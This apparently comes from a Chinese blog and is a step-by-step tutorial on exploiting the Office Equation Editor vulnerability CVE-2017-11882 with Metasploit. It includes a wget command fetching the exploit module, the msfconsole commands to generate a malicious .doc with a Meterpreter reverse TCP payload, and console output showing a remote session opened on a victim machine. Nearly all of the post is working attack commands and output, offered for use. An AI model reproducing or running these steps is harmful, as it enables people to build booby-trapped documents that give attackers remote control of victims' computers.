cve-2017-11882漏洞利用

概述

这是一个潜伏了17年之久的远程代码执行漏洞,这个漏洞影响了目前所有的流行office软件,原理是利用了office的一个EQNEDT32.EXE组件,就是公式编辑器组件,详细的你可以看freebuf的这篇文章
打开文档变肉鸡:潜伏17年的“噩梦公式”Office漏洞攻击分析
我们现在说攻击

操作

首先下载metasploit的攻击模块
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
之后移动到下面这个目录
mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat
接着启动metasploit
输入
use exploit/windows/fileformat/office_ms17_11882

接着看一下设置选项

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf exploit(office_ms17_11882) > show options

Module options (exploit/windows/fileformat/office_ms17_11882):

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME yes Filename to save as
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic

设置生成的文件名字
set filename bboysoul.doc
设置主机ip
set lhost 192.168.1.102
开始攻击
exploit

1
2
3
4
5
6
7
msf exploit(office_ms17_11882) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Using URL: http://0.0.0.0:8080/xudLp3
[*] Local IP: http://192.168.1.102:8080/xudLp3
[*] Server started.

之后当前目录下会生成一个叫bboysoul.doc的文件,我们在受害者机器下打开就好
注意我使用的是office201064位专业版,机器是windows764位
经过测试32位的windows和office是不能用的
接着在受害者机器打开这个文件就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Handling initial request from 192.168.1.113
msf exploit(office_ms17_11882) > [*] 192.168.1.113 office_ms17_11882 - Stage two requested, sending...
msf exploit(office_ms17_11882) > [*] Sending stage (205379 bytes) to 192.168.1.113
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.113:49225) at 2017-11-25 05:31:10 -0500

msf exploit(office_ms17_11882) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B 192.168.1.102:4444 -> 192.168.1.113:49225 (192.168.1.113)

欢迎关注Bboysoul的博客www.bboy.app
Have Fun

欢迎关注我的其它发布渠道